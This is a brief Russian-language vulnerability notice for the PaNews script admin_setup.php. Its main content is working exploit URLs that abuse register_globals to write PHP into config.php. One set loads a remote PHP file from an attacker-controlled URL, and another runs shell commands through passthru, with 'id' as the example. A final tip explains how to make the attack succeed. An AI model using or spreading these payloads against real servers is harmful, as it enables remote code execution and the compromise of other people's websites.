Уязвимость существует при обработке
некоторых параметров в сценарии admin_setup.php
при опции register_globals=on в конфигурационном
файле php.ini. Удаленный пользователь может с
помощью специально сформированного URL
выполнить произвольный php сценарий и
произвольные команды на системе с
привилегиями текущего web сервера.
PHP-инклюдинг
http://victim/panews/includes/admin_setup.php?access[]=admins &do=updatesets&form[comments]=$nst&form[autoapprove]=
$nst&disvercheck=$nst&installed=$asd&showcopy=include($nst)
http://victim/panews/includes/config.php?nst=http://your/file.php
Выполнение команд
http://victim/panews/includes/admin_setup.php?access[]=admins &do=updatesets&form[comments]=$nst&form[autoapprove]
=$nst&disvercheck=$nst&installed=$asd&showcopy=passthru($nst)
http://victim/panews/includes/config.php?nst=id
Примечание: Для успешной реализации
уязвимости необходимо отключить
выполнение javscript сценариев в браузере.